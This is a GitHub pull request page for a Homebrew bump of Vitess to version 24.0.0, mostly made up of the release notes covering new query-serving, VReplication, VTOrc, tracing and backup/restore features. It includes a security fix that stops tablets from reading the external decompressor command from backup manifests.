vitess 24.0.0#280223
Merged
Merged
Conversation
chenrui333
approved these changes
Apr 30, 2026
Contributor
|
🤖 An automated task has requested bottles to be published to this PR. Caution Please do not push to this PR branch before the bottle commits have been pushed, as this results in a state that is difficult to recover from. If you need to resolve a merge conflict, please use a merge commit. Do not force-push to this PR branch. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Created by
brew bumpCreated with
brew bump-formula-pr.Details
release notes
--shardsflag for MoveTables/Reshard start and stop--grpc-send-session-in-streamingflag--legacy-replication-lag-algorithmflag--vtgate-balancer-modeflag--init-tablet-type-lookup--cellFlag/api/replication-analysisEndpoint RemovedMajor Changes
New Support
Window function pushdown for sharded keyspaces
This release introduces an optimization that allows window functions to be pushed down to individual shards when they are partitioned by a column that matches a unique vindex.
Previously, all window function queries required single-shard routing, which limited their applicability on sharded tables. With this change, queries where the
PARTITION BYclause aligns with a unique vindex can now be pushed down and executed on each shard.For examples and more details, see the documentation.
View Routing Rules
Vitess now supports routing rules for views, and can be applied the same as tables with
vtctldclient ApplyRoutingRules. When a view routing rule is active, VTGate rewrites queries that reference the source view to use the target view's definition instead. For example, given this routing rule:{ "rules": [ { "from_table": "source_ks.my_view", "to_tables": ["target_ks.my_view"] } ] }And this view definition:
A query like
SELECT * FROM source_ks.my_viewwould be internally rewritten to:View routing rules require the schema tracker to monitor views, which means VTGate must be started with the
--enable-viewsflag and VTTablet with the--queryserver-enable-viewsflag. The target view must exist in the specified keyspace for the routing rule to function correctly. For more details, see the Schema Routing Rules documentation.Tablet targeting via USE statement
VTGate now supports routing queries to a specific tablet by alias using an extended
USEstatement syntax:For example, to target a specific replica tablet:
Once set, all subsequent queries in the session route to the specified tablet until cleared with a standard
USE keyspaceorUSE keyspace@tablet_typestatement. This is useful for debugging, per-tablet monitoring, cache warming, and other operational tasks where targeting a specific tablet is required.Note: A shard must be specified when using tablet targeting. Like shard targeting, this bypasses vindex-based routing, so use with care.
Binlog Streaming Support
VTGate now supports GTID-based binlog streaming through two protocols:
COM_BINLOG_DUMP_GTIDreplication protocol command—no special VStream-aware adapters or direct MySQL access required.BinlogDumpGTIDstreaming RPC invtgateserviceprovides native gRPC access for custom clients without the MySQL protocol dependency.Note: Only GTID-based streaming is supported. File/position-based streaming is not available through either
COM_BINLOG_DUMPorCOM_BINLOG_DUMP_GTIDand returns an error.This feature is disabled by default. Enable it with
--enable-binlog-dump.New flags:
--enable-binlog-dump: Enables binlog dump support. Without this flag, binlog dump requests return an error.--binlog-dump-authorized-users: Comma-separated list of users authorized to execute binlog dump operations, or%to allow all users.Requirements:
When initiating a binlog dump connection, clients must specify:
filepos) of 4For gRPC clients, specify the keyspace, shard, and optionally the tablet type or tablet alias directly in the
BinlogDumpGTIDRequest.Limitations:
MoveTablesorReshardoperations. Use the VStream API for those use cases.Structured logging
Vitess now uses structured JSON logging by default. Log output is emitted as JSON to stderr. To configure the minimum log level, pass
--log-level(one ofdebug,info,warn,error; defaultinfo). For a human-readable format with automatic color detection, pass--log-format=text. To revert to the previousglogbackend, pass--log-structured=false.glogis deprecated as of v24 and will be removed in v25.Breaking Changes
External Decompressor No Longer Read from Backup MANIFEST by Default
The external decompressor command stored in a backup's
MANIFESTfile is no longer used at restore time by default. Previously, when no--external-decompressorflag was provided, VTTablet would fall back to the command specified in theMANIFEST. This posed a security risk: an attacker with write access to backup storage could modify theMANIFESTto execute arbitrary commands on the tablet.Starting in v24, the
MANIFEST-based decompressor is ignored unless you explicitly opt in with the new--external-decompressor-use-manifestflag. If you rely on this behavior, add the flag to your VTTablet configuration, but be aware of the security implications.See #19460 for details.
Minor Changes
VReplication
--shardsflag for MoveTables/Reshard start and stopThe
startandstopcommands for MoveTables and Reshard workflows now support the--shardsflag, allowing users to start or stop workflows on a specific subset of shards rather than all shards at once.Example usage:
Automatic tablet retry for tablet-specific errors
VReplication workflows now automatically retry with different tablets when encountering tablet-specific errors. Previously, workflows without a cell preference would default to the local cell and could get stuck retrying the same failing tablet indefinitely.
When a tablet encounters errors like binary log purging (MySQL error 1236 or 1789) or GTID set mismatches, VReplication adds that tablet to an ignore list and tries other tablets across all cells. Once all matching tablets have been tried, the ignore list is cleared and the workflow retries from scratch.
This is particularly useful in multi-cell deployments where a tablet in the local cell may lack the required binary logs, but tablets in other cells still have them.
VTGate
Removed
--grpc-send-session-in-streamingflagThe VTGate flag
--grpc-send-session-in-streaminghas been removed. This flag was deprecated in v22 via #17907 and defaulted totrue.The session is now always sent as the last packet in the streaming response for
StreamExecuteandStreamExecuteMultiRPCs. This behavior is required to support transactions in streaming and cannot be disabled.Impact: Remove any usage of the
--grpc-send-session-in-streamingflag from VTGate startup scripts or configuration.New default for
--legacy-replication-lag-algorithmflagThe VTGate flag
--legacy-replication-lag-algorithmnow defaults tofalse, disabling the legacy approach to handling replication lag by default.Instead, a simpler algorithm purely based on low lag, high lag and minimum number of tablets is used, which has proven to be more stable in many production environments. A detailed explanation of the two approaches is explained in this code comment.
In v25 this flag will become deprecated and in the following release it will be removed. In the meantime, the legacy behaviour can be used by setting
--legacy-replication-lag-algorithm=true. This deprecation is tracked in vitessio/vitess#18914.New "session" mode for
--vtgate-balancer-modeflagThe VTGate flag
--vtgate-balancer-modenow supports a new "session" mode in addition to the existing "cell", "prefer-cell", and "random" modes. Session mode routes each session consistently to the same tablet for the session's duration.To enable session mode, set the flag when starting VTGate:
Query Serving
JSON_EXTRACT now supports dynamic path arguments
The
JSON_EXTRACTfunction now supports dynamic path arguments like bind variables or results from other function calls. Previously,JSON_EXTRACTonly worked with static string literals for path arguments.NULL handling now matches MySQL behavior. The function returns NULL when either the document or path argument is NULL.
Static path arguments are still optimized, even when mixed with dynamic arguments, so existing queries won't see any performance regression.
VTTablet
New Experimental flag
--init-tablet-type-lookupThe new experimental flag
--init-tablet-type-lookupfor VTTablet allows tablets to automatically restore their previous tablet type on restart by looking up the existing topology record, rather than always using the static--init-tablet-typevalue.When enabled, the tablet uses its alias to look up the tablet type from the existing topology record on restart. This allows tablets to maintain their changed roles (e.g., RDONLY/DRAINED) across restarts without manual reconfiguration. If disabled or if no topology record exists, the standard
--init-tablet-typevalue will be used instead.Note: Vitess Operator–managed deployments generally do not keep matching tablet records in the topo across pod replacements, so this feature will have a more limited effect in those environments.
QueryThrottler Observability Metrics
VTTablet now exposes new metrics to track QueryThrottler behavior.
Four new metrics have been added:
All metrics include labels for
Strategy,Workload, andPriority. TheQueryThrottlerThrottledmetric has additional labels forMetricName,MetricValue, andDryRunto identify which metric triggered the throttling and whether it occurred in dry-run mode.These metrics help monitor throttling patterns, identify which workloads are throttled, measure performance overhead, and validate behavior in dry-run mode before configuration changes.
QueryThrottler Event-Driven Configuration Updates
QueryThrottler configuration is now propagated to and stored in the
SrvKeyspacerecord within the topology server and managed using standard topology tools. Previously, tablets polled for configuration changes every 60 seconds. Tablets now use event-driven watches (WatchSrvKeyspace) to receive updates immediately when the query throttling configuration changes. All tablets in a keyspace see configuration changes at roughly the same time, and topology server changes are versioned and auditable.This change replaces the previous file-based configuration loader with a protobuf-defined configuration structure stored in the topology. The new configuration includes fields for enabling/disabling throttling, selecting the throttling strategy, and configuring strategy-specific rules.
Tablet Connection Pool Waiter Cap
VTTablet now allows users to set a limit on the number of requests waiting to get a connection from the connection pool, for
the query, stream, and transaction connection pools. The limits are set with the following flags:
--queryserver-config-query-pool-waiter-cap--queryserver-config-stream-pool-waiter-cap--queryserver-config-txpool-waiter-capAll of the above have a default value of
0, meaning no limit, thus preserving the behavior of the previous version.Tracing
OpenTelemetry tracing support
Vitess now supports OpenTelemetry as a tracing backend. To use it, set
--tracer opentelemetryon any Vitess binary. Traces are exported via OTLP/gRPC, configurable with the following flags:--otel-endpoint: OpenTelemetry collector endpoint. If empty, theOTEL_EXPORTER_OTLP_ENDPOINTenv var is used; if that is also unset, the OTel SDK defaults tolocalhost:4317.--otel-insecure(defaultfalse): use insecure connection to the collector.--tracing-sampling-rate(default0.1): sampling rate for traces (shared across all tracing backends).Any OTLP-compatible backend (Jaeger v1.35+, Grafana Tempo, Datadog Agent, etc.) can receive these traces.
Deprecation of OpenTracing-based tracing backends
The following tracing backends are deprecated as of v24 and will be removed in v25:
opentracing-jaeger— Uses the Jaeger client-go library, which has been archived. The Jaeger project recommends migrating to OpenTelemetry. Users should migrate to--tracer opentelemetrywith an OTLP-compatible Jaeger endpoint (v1.35+).opentracing-datadog— Uses the OpenTracing bridge indd-trace-go. Users should migrate to--tracer opentelemetrywith the Datadog Agent's OTLP ingestion endpoint.The
--tracer opentracing-jaegerand--tracer opentracing-datadogoptions continue to work in v24 but will log a deprecation warning at startup. The following Jaeger-specific flags are also deprecated and will be removed in v25:--jaeger-agent-host--tracing-sampling-typeMigration: Replace
--tracer opentracing-jaegerwith--tracer opentelemetryand--jaeger-agent-host host:portwith--otel-endpoint host:4317. Ensure your Jaeger deployment accepts OTLP (Jaeger v1.35+ listens on port 4317 by default).VTOrc
New
--cellFlagVTOrc now supports a
--cellflag that specifies which Vitess cell the VTOrc process is running in. The flag is optional in v24 but will be required in v25+, similar to VTGate's--cellflag.When provided, VTOrc validates that the cell exists in the topology service on startup. Without the flag, VTOrc logs a warning about the v25+ flag requirement.
This enables future cross-cell problem validation, where VTOrc will be able to ask another cell to validate detected problems before taking recovery actions. The flag is currently validated but not yet used in VTOrc recovery logic.
Note: If you're running VTOrc in a multi-cell deployment, start using the
--cellflag now to prepare for the v25 requirement.Ordered Recovery Execution and Semi-Sync Rollout
VTOrc now executes recoveries per-shard with a defined ordering, rather than per-tablet in isolation. Problems that have ordering dependencies (e.g., semi-sync configuration) are executed serially first, while independent problems are executed concurrently. This ensures that dependent recoveries happen in the correct sequence within a shard.
The main user-facing improvement is for semi-sync rollouts: VTOrc now ensures replicas have semi-sync enabled before updating the primary. Previously, enabling semi-sync on the primary before enough replicas were ready could stall writes while the primary waited for semi-sync acknowledgements that no replica was prepared to send.
See #19427 for details.
Deprecated VTOrc Metric Removed
The
DiscoverInstanceTimingsmetric has been removed from VTOrc in v24. This metric was deprecated in v23.Migration: Use
DiscoveryInstanceTimingsinstead, which provides the same timing information for instance discovery actions (Backend, Instance, Other).Impact: Monitoring dashboards or alerting systems using
DiscoverInstanceTimingsmust be updated to useDiscoveryInstanceTimings.Deprecation of Snapshot Topology feature
VTOrc's Snapshot Topology feature, which is enabled by setting
--snapshot-topology-intervalto a non-zero-value is deprecated as of v24 and the logic is planned for removal in v25.The lack of facilities to read the snapshots created by this feature coupled with the in-memory nature of VTOrc's backend means this logic has limited usefulness. This deprecation is explained and tracked in detail in vitessio/vitess#18691.
Migration: remove the VTOrc flag
--snapshot-topology-intervalbefore v25.Impact: VTOrc can no longer create snapshots of the topology in it's backend database.
Deprecated
/api/replication-analysisEndpoint RemovedThe
/api/replication-analysisendpoint has been removed from VTOrc in v24. Use/api/detection-analysisinstead, which provides the same functionality.Migration: Update any scripts, monitoring systems, or automation that calls
/api/replication-analysisto use/api/detection-analysisinstead. The replacement endpoint accepts the same query parameters (keyspace,shard) and returns the same JSON response format.Impact: HTTP requests to
/api/replication-analysiswill return a 404 Not Found error.Metrics
Extended Go Runtime Metrics via Prometheus
Vitess now exposes the full set of Go runtime metrics via Prometheus. The default Prometheus
GoCollectoronly exposes threeruntime/metrics(/gc/gogc:percent,/gc/gomemlimit:bytes,/sched/gomaxprocs:threads) plus the legacygo_memstats_*set. Starting in v24, all Vitess components expose approximately 150 additional metrics from Go'sruntime/metricspackage.New metrics include:
A new
go_info_extgauge is also added withcompiler,GOARCH, andGOOSlabels, providing extended build environment information beyond the standardgo_infometric.Affected components: vtgate, vttablet, vtctld, vtorc, vtbackup, mysqlctld
No configuration required — the metrics appear automatically on the
/metricsendpoint for all components using the Prometheus backend.Backup and Restore
MySQL CLONE Support for Replica Provisioning
VTTablet and VTBackup now support using MySQL's native CLONE plugin to provision new replicas by copying data directly from a donor tablet over the network. Physical-level data copying is significantly faster than logical backup and restore, especially for large datasets. Requires MySQL 8.0.17+ and InnoDB-only tables.
New Flags:
--mysql-clone-enabled--clone-from-primary--clone-from-tablet.--clone-from-tabletzone1-123) instead of restoring from backup. Mutually exclusive with--clone-from-primary.--restore-with-clone--clone-from-primaryor--clone-from-tablet.--clone-restart-wait-timeoutClone User Configuration:
--db-clone-user--db-clone-password--db-clone-use-sslExample Usage:
Clone from the shard's primary:
Clone from a specific tablet:
Note: All tablets participating in CLONE operations (both donors and recipients) must have
--mysql-clone-enabledset during MySQL initialization to ensure the CLONE plugin is loaded and the clone user exists.Restore Hook Improvements
Extended Hook Coverage: The
vttablet_restore_donehook now fires when restores are triggered viavtctldclient RestoreFromBackup. Previously, this hook only ran during tablet startup or clone operations.New Environment Variable: The hook now sets
TM_RESTORE_DATA_BACKUP_ENGINEto indicate which backup engine was used. The value comes from the backup manifest'sBackupMethodfield.TM_RESTORE_DATA_BACKUP_ENGINEis only set when a restore reads from an actual backup—not for clone-based restores or when no backup is used. Hook scripts can use this to perform engine-specific actions based on whether the restore usedbuiltin,xtrabackup, or another engine.The entire changelog for this release can be found here.
The release includes 460 merged Pull Requests.
Thanks to all our contributors: @ChaitanyaD48, @Devanshusharma2005, @MargaretMorehead, @anujagrawal380, @aparajon, @app/dependabot, @app/promptless, @app/vitess-bot, @arthurschreiber, @c-r-dev, @chengyuan, @connorolaya, @dasl-, @dbussink, @demmer, @derekperkins, @ejortegau, @esignorelli, @farhann-saleem, @frouioui, @ghostframe, @harshit-gangal, @jdoupe, @khkim6040, @lizztheblizz, @maksimov, @mattlord, @maxenglander, @mcpherrinm, @mcrauwel, @mhamza15, @nickvanw, @pourtorabehsan, @rjlaine, @rvrangel, @sbaker617, @shlomi-noach, @siddharth16396, @stefanb, @stutibiyani, @systay, @tanjinx, @tetsuro-ohyama, @timvaillancourt, @ttran397, @twthorn, @varundeepsaini, @vitess-bot, @yushuqin
View the full release notes at https://github.com/vitessio/vitess/releases/tag/v24.0.0.